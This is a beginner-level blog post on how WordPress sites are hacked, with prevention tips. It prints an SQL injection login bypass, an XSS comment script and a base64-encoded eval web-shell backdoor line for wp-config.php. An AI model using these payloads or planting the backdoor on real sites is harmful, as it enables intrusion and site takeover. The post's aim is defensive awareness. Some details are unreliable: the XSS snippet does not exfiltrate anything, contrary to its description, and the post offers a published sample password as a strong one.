How WordPress Sites Get Compromised (With Examples)

Sudheer Kumar
4 min readFeb 26, 2025

đź“ť Disclaimer:
“This article is a compilation of publicly available information on WordPress security risks. I am not a cybersecurity expert, but I have gathered insights from reliable sources to help website owners understand common vulnerabilities. For professional advice, consult a cybersecurity specialist or use reputable security services.”

Cybercriminals target WordPress sites commonly because of outdated software, weak passwords, vulnerable plugins, and poor security practices. These are the vulnerabilities of WordPress sites and common attack methods to hack them.

  • Outdated WordPress core, themes, and/or plugins
  • Weak Passwords and Brute Force Attacks
  • Insecure Plugins and Themes
  • SQL Injection (SQLi)
  • Cross-Site Scripting (XSS)
  • Malicious File Uploads
  • XML-RPC Exploits
  • Backdoor Infections
  • Phishing and Social Engineering
  • Supply Chain Attacks

Real-world examples:

1. Outdated WordPress Core, Themes, or Plugins

Example: A website running an old version of the Revolution Slider plugin was hacked in 2014. Attackers exploited a vulnerability to upload malicious files and take control of thousands of websites.

How It Happens:

  • Hackers scan for sites using outdated WordPress versions, themes, or plugins.
  • Known vulnerabilities (published in security databases) are exploited automatically.

Prevention:

  • Always update WordPress, themes, and plugins to the latest versions.
  • Remove unused plugins and themes to minimize risk.

2. Weak Passwords and Brute Force Attacks

Example: A small business website had the username “admin” and password “123456.” Hackers used a brute force attack (automated login attempts) and successfully gained access within minutes.

How It Happens:

  • Attackers use scripts to try thousands of password combinations.
  • Weak passwords make it easy to break into an admin account.

Prevention:

  • Use strong passwords like P@ssw0rd!32&x.
  • Enable two-factor authentication (2FA) for extra protection.
  • Limit login attempts with plugins like Wordfence or Login LockDown.

3. Insecure Plugins and Themes

Example: In 2019, the Yellow Pencil plugin had a vulnerability that allowed attackers to change website settings remotely. Thousands of sites were hijacked.

How It Happens:

  • Poorly coded plugins contain security flaws.
  • Nulled (pirated) themes and plugins often have backdoors, allowing hackers to take control.

Prevention:

  • Only download themes and plugins from reputable sources like WordPress.org or ThemeForest.
  • Regularly audit and remove unused plugins.

4. SQL Injection (SQLi)

Example: A hacker exploited an SQL vulnerability in an eCommerce website’s login form by entering:

' OR '1'='1' --

This tricked the database into logging them in without a password.

How It Happens:

  • Attackers inject malicious SQL queries into input fields (e.g., login pages, search boxes).
  • They extract sensitive data or bypass authentication.

Prevention:

  • Use security plugins like All In One WP Security to block SQL injections.
  • Always sanitize and validate user input.

5. Cross-Site Scripting (XSS)

Example: A hacker posted a comment on a blog with this JavaScript code:

<script>document.cookie="stolen="+document.cookie</script>

Anyone who viewed the comment had their login session stolen, allowing the hacker to access their accounts.

How It Happens:

  • Malicious scripts are injected into input fields (comments, contact forms).
  • The script executes when a user visits the page, often stealing session cookies.

Prevention:

  • Use plugins like WPForms that sanitize input.
  • Disable JavaScript execution in comment sections.

6. Malicious File Uploads

Example: A hacker uploaded an innocent-looking image named profile.jpg.php. Since the server allowed .php execution, the file was used to take full control of the site.

How It Happens:

  • Sites with poorly secured file upload forms allow malicious files to be uploaded.
  • Hackers can execute PHP scripts to gain admin access.

Prevention:

  • Restrict file uploads to specific formats (e.g., only .jpg, .png).
  • Use a security plugin to scan uploaded files.

7. XML-RPC Exploits

Example: A hacker used XML-RPC pingbacks to send thousands of requests to a website, overloading the server and causing downtime.

How It Happens:

  • The XML-RPC API (enabled by default) allows remote WordPress functions.
  • Attackers abuse it for DDoS attacks or mass brute force attempts.

Prevention:

  • Disable XML-RPC using the Disable XML-RPC plugin.
  • Use a firewall like Cloudflare to block suspicious requests.

8. Backdoor Infections

Example: A hacker compromised a WordPress site and inserted this line in wp-config.php:

eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NvbW1hbmQnXSk7'));

This hidden backdoor allowed them to regain access even after the admin changed passwords.

How It Happens:

  • After hacking a site, attackers insert hidden code into WordPress core files.
  • Even after cleanup, they can use the backdoor to re-infect the site.

Prevention:

  • Scan files regularly using Wordfence or Sucuri Security.
  • Avoid using pirated themes/plugins, as they often contain backdoors.

9. Phishing and Social Engineering

Example: A WordPress admin received an email claiming:
“Your website has a security issue. Click here to log in and fix it.”
The link led to a fake login page, where they unknowingly entered their real credentials.

How It Happens:

  • Hackers send emails pretending to be WordPress support or hosting providers.
  • Victims are tricked into entering login credentials on fake websites.

Prevention:

  • Always verify email senders before clicking links.
  • Use password managers to detect fake login pages.

10. Supply Chain Attacks

Example: A popular WordPress plugin, WP GDPR Compliance, was hacked in 2018. Attackers injected malicious updates, affecting over 100,000 websites.

How It Happens:

  • If a plugin developer’s account is hacked, attackers can push malicious updates.
  • All sites using that plugin get infected.

Prevention:

  • Monitor plugin updates for suspicious changes.
  • Use security plugins to block unauthorized file modifications.

How to Secure Your WordPress Site

✅ Update everything — Keep WordPress, plugins, and themes updated.
✅ Use strong passwords — Enable two-factor authentication (2FA).
✅ Install security plugins — Use Wordfence, Sucuri, or MalCare.
✅ Limit login attempts — Prevent brute force attacks.
✅ Disable XML-RPC — Reduce attack surfaces.
✅ Use a firewall — Block suspicious traffic with Cloudflare.
✅ Scan regularly — Detect malware before it spreads.

“Website security is complex, and new threats emerge regularly. For expert guidance, consider consulting a cybersecurity professional or using dedicated security tools.”

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Sudheer Kumar
Sudheer Kumar

No responses yet

Write a response